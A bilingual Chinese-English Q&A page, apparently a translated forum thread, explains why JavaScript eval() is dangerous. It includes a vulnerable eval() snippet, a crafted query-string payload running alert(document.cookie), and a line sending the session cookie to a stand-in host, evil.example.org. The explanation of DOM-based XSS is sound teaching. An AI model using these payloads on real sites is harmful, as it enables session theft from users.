javascript eval（）和安全性 [英] javascript eval() and security

问题描述

developer.mozilla.org说：

developer.mozilla.org says:

不要不必要地使用eval！ eval（）是一个危险的函数，
会使用调用者的特权执行它传递的代码。

Don't use eval needlessly! eval() is a dangerous function, which executes the code it's passed with the privileges of the caller.

https://developer.mozilla.org/zh-CN/docs / Web / JavaScript / Reference / Global_Objects / eval

任何恶意用户都可以打开chrome调试器，例如修改正在执行的javascript代码。这样他就可以执行自己的功能了。

Any malicious user can turn on chrome debugger for example, and modify javascript code that is being executed. So he can put his own functions to be executed etc.

一般是否存在安全javascript代码之类的东西？

Is there such thing as "secure javascript code" in general?

推荐答案

例如，任何恶意用户都可以打开chrome调试器，并修改正在执行的
javascript代码。这样他就可以执行自己的
函数，等等。

Any malicious user can turn on chrome debugger for example, and modify javascript code that is being executed. So he can put his own functions to be executed etc.

是的，用户可以攻击自己的客户端

Yes, a user can "attack" their own client-side session using JavaScript by using developer tools.

但是，eval和开发人员工具之间的区别在于eval可以在共享链接中执行操作。攻击者可以向受害者发送一个链接，该链接利用了代码评估功能。

However, the difference between eval and developer tools is that eval may execute things in shareable links. The attacker could send their victim a link, which exploits the code evaluation function.

接受以下代码：

<script>

eval('alert("Your query string was ' + unescape(document.location.search) + '");');

</script>

现在，如果查询字符串为？foo 您只需得到一个警告对话框，说明以下内容：您的查询字符串为？foo

Now if the query string is ?foo you simply get an alert dialog stating the following: Your query string was ?foo

现在说查克向鲍勃发送了一个电子邮件，主题为看看这个很棒的链接！。

Now say Chuck sends Bob an email with the subject "Look at this great link!".

链接的结构如下：

http://www.example.com/page.htm?hello%22）;警报（document.cookie +％22 ，其中www.example.com是您的网站。

http://www.example.com/page.htm?hello%22);alert(document.cookie+%22, where www.example.com is your website.

这会将 eval（）执行的代码修改为

This modifies the code that is executed by eval() to

alert("Your query string was hello");
alert(document.cookie+"");

（为清楚起见，我添加了新行）。这将显示一个警告框，显示所有非httpOnly cookie。

(New lines added by me for clarity). This will show an alert box displaying all the non httpOnly cookies.

将其带到下一个阶段，攻击者可以构建图像链接以将会话cookie发送给自己

Take this to the next stage and the attacker could construct an image link to send the session cookie to themselves

new Image().src="https://evil.example.org/?cookie=" + escape(document.cookie)

这被称为跨站点脚本（XSS）攻击。实际上，该类型是特定的基于DOM的XSS。

This is known as a Cross-Site Scripting (XSS) attack. In fact, the type is a DOM based XSS, to be specific.

通常是否存在诸如安全javascript代码之类的东西？

Is there such thing as "secure javascript code" in general?

是的，可以将针对XSS的安全代码视为安全JavaScript代码，它可以保护当前用户免受跨域攻击。但是，信任当前最终用户不会使用开发人员工具修改JavaScript代码或变量到自己的优势的服务器端代码虽然不安全。

Yes, code that's secure against XSS could be considered "secure JavaScript code" - it protects the current user from cross-domain attacks. However, server-side code that "trusts" that the current end-user won't modify JavaScript code or variables to their own advantage using developer tools though isn't secure.

因此安全的JavaScript代码就是仅保护当前用户的代码。

Therefore secure JavaScript code is such code that will protect the current user only.

这篇关于javascript eval（）和安全性的文章就介绍到这了，希望我们推荐的答案对大家有所帮助，也希望大家多多支持IT屋！